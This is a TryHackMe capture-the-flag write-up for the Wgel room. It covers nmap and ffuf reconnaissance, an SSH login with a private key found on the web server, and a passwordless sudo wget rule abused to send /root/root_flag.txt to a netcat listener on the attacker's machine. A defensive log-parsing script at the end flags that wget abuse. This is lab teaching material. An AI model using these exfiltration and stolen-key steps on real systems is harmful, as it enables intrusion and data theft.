TryHackMe : Wgel CTF Write-up

Abdullah Hamza
6 min read · Oct 28, 2023


To access the box, click on the following link and join the room.

Check connection

Ping the machine IP to check whether the connection is established. In my case the ping is successful, so the connection is established.

Successful Ping Results

Scanning

Let’s start with an nmap scan. Use the following command to scan the target IP address.

sudo nmap -sV -A 10.10.142.110

The above command runs an Nmap scan with service version detection (-sV) and aggressive detection (-A) against the IP address 10.10.142.110. -A enables OS detection, version detection, default script scanning and traceroute, so -sV is already implied by it; sudo is needed because OS detection requires raw socket access. This type of scan is used for in-depth reconnaissance of the services, and their versions, running on the target system, and the results give us useful information about potential vulnerabilities and system details. The scan result shows that ports 22 and 80 are open.

nmap scan results in kali linux

On visiting the target IP we get the default Apache2 page.

Target IP in browser

Let’s view the page source to check whether there is something special in it. Right-click and choose View Page Source.

Target IP in browser

We found an unusual comment: someone is reminding Jessie to update the website. Ok! Thank you, someone. We have seen that port 22 is open for SSH, so maybe we can use jessie as the username to SSH into the server.

Source code of default page in browser

Directory busting

Now, let’s start directory busting on the target IP. I have used my all-time favourite tool, ffuf, for that purpose.

ffuf -u http://10.10.142.110/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt

  • ffuf: the command to run FFuF.
  • -u http://10.10.142.110/FUZZ: specifies the target URL to scan. The FUZZ keyword is a placeholder that FFuF replaces with each item from the wordlist.
  • -w /usr/share/seclists/Discovery/Web-Content/common.txt: specifies the wordlist to use for the scan. Here the common.txt wordlist from SecLists is used to test for common directories and files on the target web server.

Directory busting results with ffuf

We got a sitemap entry with status code 301 (a redirect, which on Apache usually means a directory requested without its trailing slash). Let’s visit it in the browser and check what we have got.

Sitemap page on target IP

Directory busting on sitemap page

The sitemap page is empty. Let’s start directory busting on this page. Use the following command to find directories under sitemap.

ffuf -u http://10.10.142.110/sitemap/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt

  • ffuf: the command to run FFuF.
  • -u http://10.10.142.110/sitemap/FUZZ: specifies the target URL to scan. The FUZZ keyword is a placeholder that FFuF replaces with each item from the wordlist.
  • -w /usr/share/seclists/Discovery/Web-Content/common.txt: specifies the wordlist to use for the scan. Here the common.txt wordlist from SecLists is used to test for common directories and files under the sitemap path.

Directory busting results on sitemap page

Get id_rsa/Private key

We found an ssh entry in the results. Let’s visit the page in the browser.

SSH page on target IP

We found id_rsa. With this private key we can gain unauthorized access to any SSH server that is configured to accept connections using it. If the key is associated with jessie’s account on this server, we can potentially compromise it. Sounds great!

Click on id_rsa to copy the private key.

id_rsa file contents

Copy the contents of id_rsa, open the nano editor in a terminal, paste the private key and save it as id_rsa.

Using nano editor to copy content

Press CTRL + O to save and CTRL + X to exit.

nano editor in terminal

Setting permission 600 on id_rsa (chmod 600 id_rsa) is required, not just good practice. With mode 600 the file is readable and writable only by its owner and inaccessible to every other user and group, and ssh refuses to use a private key that other users can read (it prints an “UNPROTECTED PRIVATE KEY FILE” warning and ignores the key). Restrictive permissions matter for any sensitive file, and especially for SSH private keys.

Setting permissions for id_rsa file

SSH into the server

Use the following command to SSH in with the private key as the user jessie. The sudo is not actually needed here: ssh works as a normal user, and running it as root does not bypass the key permission check.

sudo ssh -i id_rsa jessie@10.10.142.110

Boom!!! We are logged in as jessie. Let’s run the whoami command to verify.

SSH into the server

Use the pwd command to check the current working directory.

pwd and ls command results

We can get the operating system, kernel version, hostname and architecture with the command uname -a.

uname -a command results

Get user flag

Now, let’s find the user flag with the find command given below.

find / -name "*flag*"

This command searches the entire file system, starting from the root directory (/), for files and directories whose names contain the word “flag”. It is the usual way to locate files by a keyword in their names. Searching from / as an unprivileged user prints many Permission denied errors; appending 2>/dev/null to the command hides them.

find command results

We found the user_flag.txt file.

found user_flag.txt

Now use the cat command to view the contents of that file, and we get the user flag.

user flag captured using cat command

Get root flag

Use the “sudo -l” command to list what the current user may run through sudo. It shows that the user “jessie” is allowed to run any command as any user on the system, and also that jessie can run “/usr/bin/wget” as root without entering a password. Because wget can read local files (--post-file) and write them (-O), a NOPASSWD rule for it is effectively a root-level file read/write primitive, so we can get the root flag file without a password. On a real system the fix is simply not to grant passwordless sudo on tools that can read or write arbitrary files.

sudo -l command results

Starting listener

Use netcat to start a listener.

nc -lvp 3344

The above command sets up a netcat listener on port 3344. Netcat is a versatile networking utility, and this command uses the following options:

  • -l: tells netcat to listen for incoming connections.
  • -v: stands for “verbose” and makes netcat display more information about the connection.
  • -p 3344: specifies the port number, in my case port 3344.

Listener started in terminal

Use the ifconfig command to get your own host IP.

Get host IP with ifconfig

Now, finally, use the wget command to send the root flag to the listener.

sudo /usr/bin/wget --post-file=/root/root_flag.txt http://10.8.180.91:3344/

The command uses wget to send an HTTP POST request, with a file as its body, to the specified URL.

  • sudo: runs the command with superuser privileges (no password is needed because of the NOPASSWD rule for wget).
  • /usr/bin/wget: the full path of the wget command, a tool for non-interactive downloading of files from the web, given exactly as it appears in the sudo rule.
  • --post-file=/root/root_flag.txt: tells wget to send the contents of /root/root_flag.txt as the body of an HTTP POST request; the file is read with root privileges.
  • http://10.8.180.91:3344/: the URL the POST request is sent to, which is our netcat listener, so the contents of root_flag.txt show up there.

I just assumed that the root flag should be under the root directory and might have a name similar to user_flag, so I tried with the name root_flag.txt and it worked.
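A defender-side check for the sudo misconfiguration above, added here as an example (it is not code from the original post): it parses sudo entries from auth.log and flags any root-level wget run that reads a local file (--post-file/--body-file) or writes one (-O/-P), so the transfer performed in this write-up shows up as an alert. The log lines, hostname and paths are constructed placeholders.

```python
import os
import re

# Constructed sample auth.log lines for this example (not from the original post); the
# hostname, timestamps and paths are placeholders. sudo writes one such line per command.
SAMPLE_AUTH_LOG = """\
Oct 28 10:15:02 corp-host sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget --post-file=/root/root_flag.txt http://10.8.180.91:3344/
Oct 28 10:16:30 corp-host sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget -q https://updates.example/pkg.tar.gz
Oct 28 10:17:11 corp-host sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget -O /opt/agent/agent.bin http://10.8.180.91:8000/agent.bin
Oct 28 10:18:45 corp-host sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/bin/ls /root
"""

# Invoking user, target user (USER=) and command line of a sudo log entry.
SUDO_LINE = re.compile(r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$")
UPLOAD_OPTS = ("--post-file=", "--body-file=")              # wget reads a local file and sends it
WRITE_OPTS = ("--output-document=", "--directory-prefix=")  # wget writes to a chosen path


def classify_wget(argv):
    """Return why this wget command line reads or writes local files, or None for a plain download."""
    args = argv[1:]
    for i, arg in enumerate(args):
        for opt in UPLOAD_OPTS:
            if arg.startswith(opt):
                return "uploads local file " + arg[len(opt):]
        for opt in WRITE_OPTS:
            if arg.startswith(opt):
                return "writes to " + arg[len(opt):]
        if arg[:2] in ("-O", "-P"):
            # Short form, either "-O path" (separate argument) or glued "-Opath".
            target = arg[2:] if len(arg) > 2 else (args[i + 1] if i + 1 < len(args) else "")
            if target and target != "-":  # "-O -" only writes to stdout
                return "writes to " + target
    return None


def find_privileged_wget(log_text):
    """Return (user, runas, reason) for sudo-run wget commands that touch local files."""
    findings = []
    for line in log_text.splitlines():
        m = SUDO_LINE.search(line)
        if not m:
            continue
        argv = m.group("cmd").split()
        if argv and os.path.basename(argv[0]) == "wget":
            reason = classify_wget(argv)
            if reason is not None:
                findings.append((m.group("user"), m.group("runas"), reason))
    return findings
```

Run against the sample it returns two findings: the --post-file upload of /root/root_flag.txt and the -O write, while the plain download and the ls entry are ignored.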

Root flag captured with listener

We got the root flag. Congratulations!!

captured root flag

Paste the flags into TryHackMe.

The room is completed

This walkthrough finishes here. Stay tuned for the next adventure! 🚀😊

Written by Abdullah Hamza

Developer | CEH | Penetration Tester | Red Team
